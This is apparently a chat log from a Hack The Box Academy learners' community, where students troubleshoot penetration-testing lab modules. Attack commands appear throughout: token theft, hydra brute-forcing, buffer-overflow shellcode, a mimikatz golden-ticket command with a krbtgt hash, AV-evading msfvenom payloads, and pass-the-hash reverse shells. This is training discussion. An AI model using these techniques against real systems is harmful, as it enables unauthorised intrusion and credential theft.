yes which leads me to my next question lol, in the next section they steal_token, but don't explain why they chose that token nor do they explain why they went into the c:\Inetpub>dir in the section after that. Maybe i'm lost there because I dont have prior experience with these tools before enrolling in the course or maybe i'll learn more later in the modules

meterpreter > steal_token 1836

Stolen token with username: NT AUTHORITY\NETWORK SERVICE

i guess you could steal any token with "NT AUTHORITY\NETWORK SERVICE"?

Not sure where I'm going wrong with this - on the AD trust attacks SA, running bloodhound-python is giving me DNS errors:
└─$ apt bloodhound-python -u htb-student -p 'HTB_@cademy_stdnt' --dns-timeout 15 -d 'child.inlanefreight.ad' -dc 'CHILD-DC.child.inlanefreight.ad' -ns 10.129.229.201 --dns-tcp

But, when running it with a "." at the end of the domain as suggested here - https://github.com/dirkjanm/BloodHound.py/pull/196 - it works? /etc/hosts has the correct info there
└─$ bloodhound-python -u htb-student -p 'HTB_@cademy_stdnt' --dns-timeout 15 -d 'child.inlanefreight.ad.' -dc 'CHILD-DC.child.inlanefreight.ad' -ns 10.129.229.201 --dns-tcp INFO: Found AD domain: child.inlanefreight.ad WARNING: Could not find a global catalog server, assuming the primary DC has this role If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc INFO: Getting TGT for user INFO: Connecting to LDAP server: CHILD-DC.child.inlanefreight.ad INFO: Found 1 domains

Yeah i think you're right, anything with NT as the user should work in my mind

"We should try migrating our process to a user with more privilege."

worth testing it to be 100%

ok cool, i think the metasploit module is my favorite so far, wish it wasn't labeled as "Easy" lol

hehe password attacks is fun too

it steps up a level when you get to pivoting tho at least it did for me

awesome, looking forward to learning about ligolo though i'm not sure how in depth the course goes into it

oh i'm sure i'll be back here soon

It didn't go into ligolo yet for me but i think you can use it as an alternative, it takes you through quite a few different pivoting tools and methods, chisel is one it recommends but i hear ligolo is better

i'm a 44yo construction worker with an IT degree from 2002 lol, this pentesters course is wild for existing, so thankful

nice!!! yeah same! super fun and useful

hey guys i am a little stuck here

i am on

-Password Attacks
Credential Hunting in Linux

#Examine the target and find out the password of the user Will. Then, submit the password as the answer.

I am logged in as kira on ssh (got the pw)

i see the json file on kira her machine i copy paste the text it to my own machine to crack it does not work
i was trying to copy over files with sftp does not work (need sudo for alot)

i am really stuck if someone could help yes please

i've seen a few youtube videos mention ligolo, one specifically for the CPTS. I haven't come across Chisel yet

good luck and thanks for responding

I hear OSCP recommends Chisel too, but everyone recommends ligolo, worth trying both

Thank you you too!!

scp can be used to copy over ssh;
scp source destination
scp myfile user@server:/path/to/upload

of course!

Ligolo blows other tools out of the water

the extra character is getting inserted after the string concatenations. i thought i could set sep='', but then nothing is written into the stack. thx for any help... i'm stumped. here's the shellcode: run $(python -c 'print("\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xbf\x54\x81\x18\x93 <snip> \x67\xa8\x70\xc2\x24\x23\x97\x52\xc1\xfe\xd8" + "\x66" * 4)')

No idea what module you're working on but I probably haven't done it

could you recommend any resources if one wants to become proficient in it?

ok

I just used like the first result, it may be slightly outdated -- but they do have documentation to figure it out

thank you

could i get some help on http misconfigurations skills assessment easy

The problem is the behaviour of python3. #modules message

i will try this thank you

thanks again for this i worked it out!

Id take a look into the file transfer module, many ways to do the same thing

i've done this, but man it requires some dedication i gotta blow the text up with zoom in, all sorts of stuff to get it "usable" i feel for you bc it makes my grip sound like a luxury

hey I have a question, im doing pentesting basics and theres an optional exercise that says get the banner of the above server (94.237.55.109:40760) but whenever I use SSH w/ it, it says Permission denied (publickey) and im not sure what to do about that

thx- i tried python 2.7, the script one-liner works. but to get the end of module answer you have to run the htb box over vpn. local machine & pwnbox don't give the correct stack size.

You likely have to give it the port number your target is using, otherwise it'll use the default ssh port number.

here's the best answer: https://forum.hackthebox.com/t/htb-academy-stack-based-buffer-overflow/3640/6

do you always have to specify a user or is there a default thats always used bc it doesnt really tell me that infor

You're given a public ip:port, that's your only scope

Ssh defaults to 22 if you don't specify the port

correct, I was just typing
"ssh 94.237.55.109:40760"

Also are you sure ssh is the way?

:)

it does say optional so idk if it just didnt teach me this yet or if I missed something

It just says "get the banner" it doesn't specify ssh

:)

true I just assumed bc under "Using netcat" it says "As we can see, port 22 sent us its banner, stating that SSH is running on it. This technique is called Banner Grabbing, and can help identify what service is running on a particular port."

Cant send images so I have to copy paste lol

Oh it does say netcat I was using nmap

Yeah you'll need to provide a user.

Not necessary for this

netcat ip port is the basic syntax

yo i am having a small hud problem, for zap i start running zap and open fire fox but none of the buttons appear and when they do it dosent scan and when i check the hud error scanner it gives me this 01:15:51 GMT+0000 (Coordinated Universal Time) ERROR errorHandler: TypeError: right-hand side of 'in' should be an object, got null @https: https://zap//zapCallBackUrl/-8015504834334403353/file/tools/commonAlerts.js 94:: {} idk if its just a me problem cause i have restarted the instance and refreshed the page and open and closed zap but its always the same result, it doesnt scan at all like no minor flags at all.

The examples won't always match what you're gonna do/expect

Can I type it as "94.237.54.116:50998" or do I need to do it as "94.237.54.116 50998"

sorry for the rudimentary questions lol

I literally gave the syntax

ur right mb

Hello, I've got a quick question. Has any one had any issues with the Windows Fundamentals module spawning a target machine?

Try changing vpn regions or reaching out to support

Alright. Ill try that. Thanks you, I have tried everything else I could think of.

Yeah it was my assumption it was being used to remotely access a host.

I have vague recollection of modules I've done.

holy christ, how important is being able to write metasploit modules?

depends on what you're doing.. if your job is writing metasploit modules probably pretty important

HAHA touché, my job right now is prepping for the CPTS

the CPTS path teaches all you need to know, so if it doesn't dive deep into metasploit module writing I wouldn't worry about it too much personally

so the path is touching on all things Pentesting but when it goes deep, that should be considered "important" to clarify

i'm stressing as if the test is literally going to expect you to know how to do everything mentioned lol

which is maybe a good thing but def overwhelming

my understanding is the exam does not deviate from the contents of the path, so essentially you won't need to go off-site to learn about things you'll need for the exam

gotcha, i'm still early in the path but worried i may not recognize i need to do X rather than Y at some point. probably natural to feel that way at this point

my advice would be to just go through all of the material and absorb as much as you can. make sure you don't just do it to do it, but make sure you actually understand the concepts they teach. then after finishing the whole path go back and touch on subjects you feel weak on.

fair enough, definitely not blasting through. Metasploit module claims 5 hours, i think i spent nearly 12 on it. just trying to avoid looking at hints and walkthrough during the exercises

yeah i understand how you feel, i haven't taken the exam yet and i feel the same way. not looking forward to having to do password attacks for example lol.

thats the next module for me 🫢

have fun with that lol

haha thanks

Hello!

Having some issues with "Attacking Common Services" -> "Attacking SMB."

Question 1: Used enum4linux-ng to list shares
Question 2: brute forced for user ||jason|| with provided wordlist, got password
Question 3: I logged into the share ||GGJ|| and downloaded ||id_rsa|| but the file is 0 bytes and ssh doesn't work for some reason. Command I'm using for SSH: ||ssh jason@10.129.xx.xx -i id_rsa||

I keep getting "Connection closed by..." error on the ssh command. the share has read permissions, which means downloading ||id_rsa|| should be fine, but I feel like the issue is with the file downloading.

Anyone know how long this is supposed to take?

if you did it successfully it would be immediately after the "OK - Undetected" part

any idea why it wouldn't generate a flag? I did this:

• Generate msfvenom shellcode
• truncate all the \n
• pasted the shellcode with no new lines into the recipe provided
• made sure my C# code has the correct key, iv, and cyberchef encrypted shellcode
• published release and copied over the exe
• check ran ok - undetected

when you created the project what did you choose?

.NET console app

still waiting on htb cpts report review going on 14 days now, biting my nails lol

Im trying to use smbclient -U bob \\\\10.129.78.176\\users and its not letting type when it prompts for the password for some reason so I cant progress

It’s 20 business days, so if you are waiting for 14 days, still some time left then 😉

uuuugh! i know, CBBH took 17 days, i got all the flags except for one but hoping they like my report

Fingers crossed

🤞

patience friend

I check my email maybe 5 times a day 😭

i think HTB can benefit from having some kind of notification of when your report gets reviewed or when it's planned to be reviewed

Get your CBBH role if you passed, will get you more access

• Use /verifycertifcation with your Cert ID & The name on the certification

Nvm module didnt mention that the input for the password is invisible so I just thought it wasnt registering

because sometimes the wait is agonizing.. also transparency

its torture

I wanna report a broken link (and the new one) in one of the Academy's modules. What is the right channel to do that?

#1234357888114364508

X-Post from #cwes .. I'm a little lost on Login Forms from Login Brute Forcing. I got the hydra command up and running but it seems like I cannot get any valid username+password combination out of it. Am I not supposed to use the shown wordlists and find my own?

What does your command look like

hydra -I -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt 94.237.50.242 -s 33067 http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

For what its worth here is the output:

DATA] attacking http-post-form://94.237.50.242:33067/:username=^USER^&password=^PASS^:Invalid credentials
[STATUS] 282.00 tries/min, 282 tries in 00:01h, 3120 to do in 00:12h, 14 active
[STATUS] 245.00 tries/min, 735 tries in 00:03h, 2667 to do in 00:11h, 14 active
[STATUS] 241.29 tries/min, 1689 tries in 00:07h, 1713 to do in 00:08h, 14 active
[STATUS] 246.58 tries/min, 2959 tries in 00:12h, 443 to do in 00:02h, 14 active
[STATUS] 245.92 tries/min, 3197 tries in 00:13h, 205 to do in 00:01h, 14 active
[STATUS] 240.07 tries/min, 3361 tries in 00:14h, 41 to do in 00:01h, 14 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-17 05:12:53

Tried tweaking the command a little but the wait-time is a little annoying.

Can you send a ss of what question you on?

CBBH -> Login Brute Forcing -> Login forms

• 2 After successfully brute-forcing, and then logging into the target, what is the full flag you find?

I will dm you to avoid spoilers

nvm got it

You can still use python3… just have to make minor adjustments

ABUSING HTTP MISCONFIGURATIONS : Skills Assessment - Hard

Hey guys!
Currently working on hard skills assessment, but unfortunately couldn’t find any solution at the moment.
Can I DM someone for a nudge please?

Does anyone have good notes for SOC Analyst path

why cant i send messages in general?

Read and follow #welcome

just saw it, sorry

Hello, I need help with Attacking Authentication Mechanisms Skills Assessment.
I have tried the module provided script, jwt_tools and now i have written my own script.
Made my own private and public keys and also x5c certificate, none of these have worked so far.
Have not modified the payload, only played with the header, to see if i can forge tokens.
Also, verified that my signed jwt's are correct. Have read the forum and other posts here but they haven't made any sense to me.

Jwt forgery is the way

There’s a lot of tampered ones to try, but there’s one that works

And don’t forget the newline

you gotta make your own

Intro to C2 Operations with Sliver > Skills Assessment. Not really sure what to get from that. Any other tips?
||You can try within the context of MSSQL$EXPRESS||

I think it’s trying to say that you don’t need to privex for this step? It’s the question about taking over the 2nd dc right?

yeah, 2nd DC

It’s a pretty standard attack from child dc to parent dc

isn't there a SID filtering in place?

I don’t think so, at least in my notes I just wrote down “-519”

||kerberos::golden /user:h4x /domain:sde.inlanefreight.local /sid:S-1-5-21-2027674183-2520992429-4195948650 /krbtgt:4dd3c61f97e887bb596c62b08b6c3def /sids:S-1-5-21-1091722548-1143476209-2285759316-519 /ptt||

Try with Administrator user instead of h4x, I know there was a windows update in 2023 that made it so that the parent domain checks if the provided user/id exists in the child domain. Maybe it doesn’t like your made up account name

works with Administrator

thanks

https://0xdeaddood.rocks/2023/05/11/forging-tickets-in-2023/ here’s a blog post about it

network fundamentals >Netwrk Typologies>>>Tree 1)The tree topology is an extended star topology that more extensive local networks have in this structure.?

2)There are both logical tree structures according to the spanning tree and physical ones.?

anyone elaborate these two statement(bold)s in simple terms ?? I appreciate your response !!!!

Read and follow #welcome

thanks

#programming might be a better place

hey guys i am stuck at an assessment on the AD part 2 can i ask for some info here or just in the forum ?

You can DM me

Okay thank you

hello guys , i apparently solve the pass-the-hash section of the password attack module but stuck to resole some of my questions , an i tried to login theough pth by xfreedrp to david account then i am not ableto access \\dc01\david , but when i tried with mimikatz i can read that particular file , any explanation ...

What's protocol for when a task answer doesn't register the correct answer/it gets locked up? I've tried re-logging & re-starting browsers and it doesn't let me get back into answering tasks.

What is the command we need to run in order to display the 'ftp' client help menu? the prompt is *** -? and I'm familiar with man pages/help through the cli and have submitted ftp -h, but apparently i'm not smart enough for this one.

Hello, I am currently on the the Information Security Foundations learning path. For the setting up module, am I supposed to follow the website and spawn an instance and follow along? For example right now I am on the Organisation page, and they are going through toolsets for us to refer to in future. However, when I spawned an instance I couldnt find the .bashrc file in my folder as shown in the instructions

hello guys i just started out with my academy via student subscription, im having trouble with this question for "Enumerate the hostname of your target and submit it as the answer. (case-sensitive)"

do you mind me asking where can i find help? this is from basic toolset course btw

hey guys, where can we see how many people have completed a module. in the badges section?

for future students, if you ever need help on the skill assessment for Advanced XSS and CSRF Exploitation, send me a PM anytime...

The same command should give you the answer for both questions

┌─[eu-academy-2]─[10.10.15.91]─[htb-ac-1155776@htb-hj9mnlegq2]─[~]
└──╼ [★]$ nmap -sS -R 10.129.159.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 08:07 CST
Nmap scan report for 10.129.159.95
Host is up (0.18s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
31337/tcp open Elite

Nmap done: 1 IP address (1 host up) scanned in 2.61 seconds

this is the scan result of what i did which solved problem one but i cant fight the "hostname" in it

True the hostname isn't shown in this output, however there are options you can use nmap with that will give you the hostname.

like what sir can i ask for help?

You already are asking for help

I can't give you the exact command because that would break the rules, but I'm sure ChatGPT can and you can also find the answer here : https://nmap.org/book/man-port-scanning-techniques.html

You’re missing the - that enumerates that for you. What flags does the module mention?

Module "Getting Started" > "Basic tool"... The answer is "SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1" but how ?? the nmap result is showing "OpenSSH 9.2p1 Debian 2+deb12u3" Everything like nmap script & advance scan is showing "OpenSSH 9.2p1 Debian 2+deb12u3"... what am I doing wrong ??

are you sure that's correct? you're scanning and connecting to that port yeah?

pay more attention to what's taught, not what's directly given in the example

I have added the IP to the hosts file, even the ping is coming back

you don't need to add anything to the hosts file

what port are you looking at for nmap to give you the answer? Nmap isn't always correct btw

there is the --script banner

the target is given to you in IP:PORT format. Read the module again to see how grabbing banners is taught

just checked and confirmed the right answer

netcat is a good tool to grab banners as well, nc ip port

just running a basic scan "sudo nmap -sV <IP>" and also "-A" same answer... I tried the sshv1 script after some research

make sure you include the target port

banner grabing isn't thought in this module tho... I don't know how to do it... I will try netcat option

It is. You can even CTRL F banner

you need the port

:)

as @glad smelt stated the target you're given a PUBLIC_IP and port

meaning that there may be other services running on the target beyond the port given by htb

What can i do when the sublist3r give me back this errors
Virustotal probably now is blocking our requests
Google probably now is blocking our requests

What errors? You can't paste screenshots because your account isn't linked

Same problem. I killed the process on port 80 and killed my session too, did you ever resolve this?

Don't kill port 80 in pwnbox, just use another port LOL

80 is what's serving you the pwnbox in-browser

like nc -lvnp 8080?

I write down virustotal and google blocking requests

No idea why VT would be blocking sublist3r

Basically

And php -S [tun0ip]:8080

If you're using the pwnbox, best practice is to learn how to bind services to an interface

This is due to the pwnbox having a public facing interface, so you'd be getting random requests from automated scanners

module : password attacks
section : Network Services
hydra is not working to to crack the password for rdp, it is taking toooo long. I've also tried many more tools to do it but can't see the results. using the resources given by hack the box. Can anyone please help me in that or it will be very kind if someone please tell me the login of rd protocol please!!!

You'll need to crack it, no shortcuts here.
Are you using the wordlist provided, and the mutated list?

Adjusting threads can also help

yup i did like everything but it is not working

is there anyother tool you can recommend that can crack the rdp password

If you already have access to the host with other creds, maybe there is some type of enumeration you could do to speed things up.

If i spin it up and crack it in under an hour you owe me $50

okkkkk buddy i think that can help me.. thanks for the tip

@marble whale

resources used:

• username.list
• password.list

which tool do you used ??

hydra

but mine is taking too long...almost 2 hours

hydra -L username.list -P password.list rdp://ip -t 16 (it dropped it back down to 4

yeah i did the same thing

i used the user/pass list from the Password-Attacks.zip from the [ Resources ] Button

as a note this is via pwnbox

anyway you owe me $50

i am doing this using the openvpn connection file, does this even make some problem

nope as long as you're not running the pwnbox at the same time you're connected to vpn it should be fine, i'd also make sure you only have one vpn connection

i'd have to use a shitty OS in-built to the Chromebook VM (Penguin)

but i can test it from there in a bit

i will owe you $50 when will i got my mistake, i don't think so that i am doing any mistake. I am using the same command as you given me before

also when running the command i got some hits that gave this info message: the valid one will be highlighted without that info

i am getting this message on every attempts 😩

you'll get a few hits like that 😉 (those combos may be valid for other services) but not all the hits will be that info

you can dm me, i'm stepping away for a minute but i'll sanity check when i'm back

Is this password attacks?

yes

yes pw attacks - Network Services section

Good Afternoon

Someone can help me?

with wrappers in Burpsuite

i think burpsuite is not working well for me

Hey guys could someone help me out

i am at Password Attacks
Pass the Hash (PtH)

Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.

i am at the part where i need to read the \DC01\david but when using the dir command i get the error The network path was not found. am i doing someting wrong?

You can DM what you have tried.

Helloo?

Hey Guys, Is there a way to fully transfer my hackthebox attackbox network into my main attack machine so That I can ping dc and run attacks from my kali without needing to do ssh everytime. I have tried dynamic port forwarding but it didnt work for me

If you mean can you setup a provided attack box that you are supposed to SSH into to attack an internal network, yeah you can setup that attack box as a pivot. That's generally how I worked through all of those modules with an attack box, as I prefer to use my VM. I just setup ligolo to pivot and do everything else necessary for the assessment or lab.

Thanks, I will try out ligolo Tool

HI

AM IN NEED OF HOW TO CONNECT TO MY TARGET MACHINE USING SHELL

SSH dynamic should work fine

BUT ALL ACCOUNTS IN THE WRITEOUT ARE SECURED

What is shell?

It didn't Worked for me. I setuped a proxy and added that to proxychain I tried pinging dc but didn't work

Did you nmap it?

I mean DCs dont normally respond to ping for one, and for two pings are icmp and dont get tunneled by proxies

YEAH

I sometimes test with nxc

I MEANT SSH

ssh user@targetIP

Please refrain from using all caps all the time

Thanks

What is example.com?

just a random website I used, It gave error

Because it’s not mapped to a real machine

What module are u on?

AD Enumiration And Attackss

Do you know the ip of the dc?

yes 172.16.5.5

Try proxychains nxc smb <IP>

okay just a sec

Also add -q after proxychains for quiet mode to remove all the output

It’s up

Ohkay But Why Can't I Ping the dc? When I run the petitpotam attack it runs succesfully But i dont get my blob on the listner side

I already said why

The dc is probably blocking pings and it can’t connect back to you unless you make a port forward

you cant port forward icmp either

Okay But I didn't Understand Why I dont recive the blob

Okayy

I mean the petitpotam

why petitpotam doesnt work is a different question that why ping doesnt work

if youre asking the second hoping to get an answer for the first youll get wrong advice

Got my answer to ping problem. Now just need assistance on the Petitpotam part

Yeah I put both answers in one message 😅

So I have to make a port forward?

I don’t think that attack even works on that module

if petitpotam requires a callback(idr off the top of my head) then yeah youd need a port forward to catch the shell

It does, When I perform the attack simply by doing ssh into machine and then it works

You can get a callback but I don’t think u can do anything after

Not gotten any response

That’s always the output most of the time

Port forwarding smb auth is kinda iffy ngl

Yep it's hard but doing ssh into that slow machine is even harder

Can you do nxc ldap <IP> -M adcs

I don’t recall the dc having adcs on it

If it doesn’t, then the attack won’t work

just a sec

the images are uploading

Yeah there’s another dc you gotta test it on

Check the /etc/hosts file

huh? But when i do everything same from attack machine by htb with ssh it works

of my kali?

No on attack machine

They have 4 different DCs

Okay just a second lemme check

Attack the CA one

okay

lemme try attack on 172.16.5.120

Nope it's not working with the ca dc either

It will be a lot easier to just ssh

yea

your targeting the wrong one

Use .5.5

@pseudo kiln Apparently you can do it💀

I have tried it shows attack completed but In the response I didn't get any

Run ntlmrelay on the attack machine

it works there

ah leave it, I will stick to simple ssh only for this module

You got the base64?

Nope I need that only

it shows attack sucessfull not I havent got any base64

but in the attack machine witb simple ssh i get base64

Yeah it would be a ton of extra work to get ntlmrelay working through a pivot

Na I would be better to just use simple ssh. But for any other tools I can use this method?

Yeah that’s what I did

Okay, Thanks for the help

Hey all i could use some help please

i am at Password Attacks

Pass the Hash (PtH)

the question is

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

i setup the listener op 8001
do the command Invoke-WMIExec or Invoke-SMBExe cant get the listener to get through

You used the payload generated from the revshell site?

Iirc thats what I did it's been a minute

i did yes

Did you encode it in base64? (Might need to select advanced) iirc sometimes it extra encodes the payload from expected

yesss

I mean is the option at the bottom "encoding" say "none" or "base 64"

It should be "none"

its of sh and encoding is none

i need help on the first question on the skill assesment (USING CME) ... pls nugget

And you ran nc.exe on the target machine

[ms01]

What is the ip you put in the revshells.com

i did yes nc in a separate cmd > ip is 172.16.1.5

Can I ping someone for Advanced Deserialization Attacks - Skills Assessment

worked fine for me, there was a few second delay after the Invoke-WMIexec completed and the nc listener catching the call

i just got it

well i redid everything
it was in the reverse shell generator

i did something wrong there

i saved the codes in my notepad that i used and then copy all of them and checked if they were the same they were not

this new one worked

thanks

👍

and i did everything in powershell

I think I found a broken activity in Academy

If you think it's broken #1234357888114364508

9/10 times though it's user error

Hello

I'm doing a php filters module in File Inclusion.

I am able to get the configure endpoint using ffuf, and I'm also able to get the source code using the command provide, but I'm not able to exploit the LFI initially.

I have tried bypassing the filters as well.

Can anyone help me?

Like as per the workflow of LFI, we usually get /etc/passwd file to know if the webapp is vulnerable or not!!

I am not able to exploit it!!

does MSF work with these vhost demo walkthrus on htb academy? im doing a module discussing msf fundamentals and they're doing an eternal blue attack, but they specify an ip without a port... im unsure if this will work or if theres extra options or syntax that must be used?

The default port is 445 as it attacks smb

Also the target given may not be vulnerable to Eblue

Sure, I realize its just a demo and im trying to follow along and all that

Rule 0: never assume anything

You won't always be able to follow along 1::1

As sometimes the point is just to showcase a thought process

but maybe the disconnect im struggling with is if this ip is serving multiple vhosts or containers or however its doing it, how will it detect 94.237.254.254:42065 vs :42069

assuming it was possible in the first place (which i wont do here but just for the examples sake)

It's usually serving mylt

Multiple

And your only scope is the given port

I think I understand that but not enough about how services are "served" on setups like this

They are on containers

how does 94.237.254.254:445 serve MY target vs another target with the same ip and diff prot?

assumign that that demo did work on the target

Dude

is what im asking make sense, i know theres a lack of technical understanding here, if you'll humor me

I'm only going to say this one more time: do NOT attack ports other than what's given

Don't worry about what other ports are doing

gosh gosh gosh

As the ONLY in-scope thing to attack is the port given

I may not be explaining this correctly

They are running a service running on that port for the exercise

It's nothing overly complex

thats http i want to say, this is a general section of the module that goes thru different demos gobuster, curl, msf, etc

It doesn't have to decide any logic

It doesn't have to run http

Any service can be running in any port

Yes, i understand that. Look this may be a better way to phrase the question... setting aside the academy module and the target box... if i had a lab env with 3 machines containerized or w/e with the same IP and diff ports, and they were all running smb on all containers they would need diff ports for smb on each container they couldnt all use 445 right?